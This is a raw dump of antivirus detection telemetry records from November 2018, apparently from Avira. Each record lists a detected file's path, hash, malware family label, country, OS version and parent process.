  Row(detection=Row(filename='remotecomputermanager.exe', filepath='C:\\Users\\X\\Desktop\\Hirens 7\\HBCD\\Programs\\RemoteComputerManager.exe', filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Update \\\\\\/Quiet  \\\\\\/InstallFile \\\\\\"C:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\Install.esd\\\\\\" \\\\\\/progressCLSID 06cfe2c4-1c5b-4002-bca2-d0667fe5b626 \\\\\\/ReportId {C3BD4254-41A1-4918-A51A-1C74251DF7F3}.201 \\\\\\"\\\\\\/ClientId\\\\\\" \\\\\\"1eeffbbd-5a32-4a02-af22-5323b7db6150\\\\\\" \\\\\\"\\\\\\/CorrelationVector\\\\\\" \\\\\\"pR8P7z\\\\\\/JgEW3X9Vd.5.1.2\\\\\\" \\\\\\/WUCachedFileName \\\\\\"17134.1.180410-1804.rs4_release_CLIENTCONSUMER_RET_x86FRE_en-us.esd\\\\\\"', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=697528, timestamp='2018-11-02T20:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ytdsetup.exe', filepath='E:\\Hannes\\YTDSetup.exe', filesize=10304000, name='Adware/Adware.543562.#M1.#R1'), hash='aeaaa560e95d54a6ed2392d59898f295f6e9368bc9b8c1d8f537b79f4c3dc798', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T08:57:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='92c58c566fe837c7534fda77d61910d6f60faa502ba4106db032949794686293', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-6\\92C58C566FE837C7534FDA77D61910D6F60FAA502BA4106DB032949794686293', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='92c58c566fe837c7534fda77d61910d6f60faa502ba4106db032949794686293', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T06:30:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Program Files (x86)\\BetterHash\\Cores\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BetterHash\\BetterHash.exe', parentsize=13204056, timestamp='2018-11-02T14:42:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='igdrcl32.dll', filepath='E:\\easy driver\\Easy.Driver.Packs.v5.2.5.5.Win7.32-Bit\\Computer\\Video\\Intel1\\HD\\igdrcl32.dll', filesize=576000, name='W32/Ramnit.CD.#M1.#R1'), hash='ef23e4819cdface48078a39c3f85aa8287712fbb113f46a18c6f62f7b31f685c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T11:17:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sentstrt.exe', filepath='\\?\\G:\\PLC程式\\GT-D V6.42\\SystemDriverOld\\WIN_9x\\sentstrt.exe', filesize=256000, name='W32/Jadtre.K.#M1.#R1'), hash='a513115e26ff7ca84d9e0b7865e13876b0dfc426d7e84287248a05623c67eda8', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:29:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135230-e4660bee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8bc0c0d5\\AVSCAN-20181102-135218-E23EB5BC\\AVSCAN-20181102-135230-E4660BEE', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:45:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='danh sách học đtv.exe', filepath='H:\\\xa0\\USB__Data\\danh sách học ĐTV.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='8d77d0f73874e20bd2cda1bf719dce3ed810abf989c246bb3f193324f0c91c17', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T01:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221553-62c936c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221553-62C936C1', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='igfxcfg.exe', filepath='d:\\software\\mather bord\\915g\\win2000\\igfxcfg.exe', filesize=512000, name='W32/Ramnit.C.#M1.#R1'), hash='f1ffbd1ec984381aaa24375458baf4b1796b8528aeb5a463310144110ae73344', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:27:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152724-a4353ba1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_80c54e39\\AVSCAN-20181102-151549-22F1BB06\\AVSCAN-20181102-152724-A4353BA1', filesize=256000, name='BDC/Daodan.123.Cli.#M1.#R1'), hash='c8ad280e8657b9c87fa431ab22c5f850af7fb469ca017d8c5de491cdb78452c5', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\nhm_windows_1.9.0.7\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\nhm_windows_1.9.0.7\\NiceHashMinerLegacy.exe', parentsize=1468416, timestamp='2018-11-02T11:52:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ue32.exe', filepath='\\\\?\\D:\\Anti Virus\\all norton virsion\\Norton AntiVirus 2003 Pro (final)\\AdvTools\\UE32.EXE', filesize=512000, name='W32/Sality.Patched.#M1.#R1'), hash='e96842aadbfbb3743367849ec9d5762a6e3632526b64c98aa5c9e218f9d02d2b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:46:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:33:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='849de1ef7edbc9a0ed76edae5afe1f0d4ee61b9980094f9b51441f7249f83ef2.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\21.11.2017-393.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1032585\\849de1ef7edbc9a0ed76edae5afe1f0d4ee61b9980094f9b51441f7249f83ef2.MRG', filesize=704000, name='HEUR/AGEN.1032585.#M1.#R1'), hash='849de1ef7edbc9a0ed76edae5afe1f0d4ee61b9980094f9b51441f7249f83ef2', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\21.12.2017-141.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T16:03:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\Users\\X\\Desktop\\ZEN Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:56:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='esplodew.exe', filepath='\\\\ts-xelcea\\share\\sts2008b\\cdgwin\\esplodew.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='c57cb68e67c5047cc23040c65b5601610ddf2166f43b1f9f900a3aabf59a5e3e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T08:11:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ntx64-laser-ml-1640-drp_1254194062.1541177626.exe', filepath='C:\\Users\\X\\Downloads\\NTx64-Laser-ML-1640-drp_1254194062.1541177626.exe', filesize=4124000, name='HEUR/APC.#M1.#R1'), hash='f2cd5bc3286bf38e9c0a3ab2992b8bb68b44a06e3f4d28bd985ada88a20d467a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=913888, timestamp='2018-11-02T16:56:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spnativemessage.exe', filepath='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\Surfing Protection Update\\SPNativeMessage.exe', filesize=1460000, name='W32/Neshta.A.#M1.#R1'), hash='fd862b80b8e984b8872cb4e0e7e7429551b1aab5f28c152edaa0beb4538628ba', metadata=Row(cmdline='\\\\\\/c', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=194640, timestamp='2018-11-02T03:42:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274050.exe', filepath='F:\\scan-peta-wb-sp2010\\3274050\\3274050.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zipdll.dll', filepath='D:\\DROPSCRIPTV1.8\\EDITOR GAMBAR ( RENAME, WATERMARK, DLL )\\FSViewer64\\ZipDll.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='fd43055f378b3429f3ce0903e2e20d23b0cfb3d7bf4c2bd0bb19e337070c8ba3', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:23:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\g2vhqhaainw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mylanviewer.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\MyLanViewer.exe", filesize=64000, name='TR/Siggen.64000.8.#M1.#R1'), hash='928970136fecc731176bb438d4e172a4564f71cc3e402b006f5210c251f1a380', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d45e', filepath='C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d45e', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESTsoft\\ALYac\\AYRTSrv.aye', parentsize=624192, timestamp='2018-11-02T05:11:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='install_flash_player_13_plugin.exe', filepath='C:\\Users\\X\\Desktop\\2018nasties\\install_flash_player_13_plugin.exe', filesize=7232000, name='HEUR/AGEN.1014567.#M1.#R1'), hash='cdd589e4299501dafddd9901450b24b6103ef55cc6496ee13a813585379d5f58', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dAcZe7\\\\\\/JmU2Py4VF.1', country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:23:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='udvderase.exe', filepath='C:\\Program Files\\Corel\\Corel Burn.Now Lenovo Edition\\uDVDErase.exe', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='986d6c6f11f0f835f658d63eccc74011e72327722f30f643be50add31ec82743', metadata=Row(cmdline='invagent.dll,RunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T03:01:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ocs_v71b.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\OCS\\ocs_v71b.exe', filesize=320000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline='\\\\\\/uac', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-02T20:17:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142620-bf217bc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ddd3d98\\AVSCAN-20181102-142536-B8C802D9\\AVSCAN-20181102-142620-BF217BC6', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T12:26:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ffbe92a1643ba4f8b15a80fe20af9ee76b304e08', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\ffbe92a1643ba4f8b15a80fe20af9ee76b304e08', filesize=320000, name='Adware/DealPly.f10c00.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:36:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297322', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297322', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:42:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='l110_x86_153ushomeexportasiaml_mp.exe', filepath='\\\\?\\D:\\RECOVERY UFD PNY\\1 FAT32\\Lost Folders\\DIR291\\L110_x86_153UsHomeExportAsiaML_MP.exe', filesize=21504000, name='W32/Sality.AG.#M1.#R1'), hash='e1444c8782c58589d1a01e7783e5616178eb3a28d12888154b2b18049f1b0371', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:08:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skypebrowserhost.exe', filepath='C:\\Program Files\\Skype\\Browser\\SkypeBrowserHost.exe', filesize=316000, name='W32/Jeefo.A.#M1.#R1'), hash='d71e41ff47dfee3dae7e2ad033dc2f83ebf992acf4d0c5ca531c84e6c84b1f5d', metadata=Row(cmdline='\\\\\\/apps \\\\\\/appinv \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\\\WICA_Programs_HOSSEIN-PC.xml\\\\\\" \\\\\\/devinv \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\\\WICA_Devices_HOSSEIN-PC.xml\\\\\\" \\\\\\/out \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\\\...\\\\CompatTel\\\\\\\\sysmain32.sdb\\\\\\" \\\\\\/log \\\\\\"C:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\CompatTelemetryLogs\\\\\\" \\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\CompatTel\\\\\\" \\\\\\/REDUCED \\\\\\/runtimeAppSdb \\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\CompatTel\\\\\\\\sysmain32Runtime.sdb\\\\\\"', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTel\\QueryAppBlock.exe', parentsize=138912, timestamp='2018-11-04T08:41:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='$rzidggu.exe', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-966121994-3784430241-111158856-1000\\$RZIDGGU.exe', filesize=1772000, name='Adware/DealPly.rgkgs.#M1.#R1'), hash='bdc4485723a6c5dbbf891d433e18d3726dd27207d37ecba8cfa08c5206bfa57e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:51:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220127-ab48b435', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-220127-AB48B435', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:01:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205349-ba476f2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205349-BA476F2C', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crossword twist.exe', filepath='D:\\العاب\\small games\\Crossword Twist\\Crossword Twist.exe', filesize=2944000, name='W32/Jeefo.A.#M1.#R1'), hash='cb1ab252cb6f209b71a14f871b4ba19f38dfcfe5cdc5a5b8442f9d9f64124ed0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\svchost.exe', parentsize=36352, timestamp='2018-11-04T12:58:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192131-366ce03f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_928360b4\\AVSCAN-20181104-192049-32960277\\AVSCAN-20181104-192131-366CE03F', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='enscript.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Evernote\\Evernote\\ENScript.exe', filesize=2368000, name='W32/Sality.AT.#M1.#R1'), hash='ce5dd91482afb7e212d23039ff05048047e91b9e4f9a909e41d0cd7925528c2c', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:55:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0012105.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0012105.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:41:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:39:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-31-004459/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:04:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141046-e7a4b4e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3ac0d7c\\AVSCAN-20181104-140302-AD230418\\AVSCAN-20181104-141046-E7A4B4E4', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T07:10:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T04:21:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:44:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:54:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa8c074438a636b90c0177fe8a1bec87d9ebdbdbdb809699cfe0aee3ee94220f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FA8C074438A636B90C0177FE8A1BEC87D9EBDBDBDB809699CFE0AEE3EE94220F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fa8c074438a636b90c0177fe8a1bec87d9ebdbdbdb809699cfe0aee3ee94220f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:27:47Z'), dt=datetime.date(2018, 11, 1))],
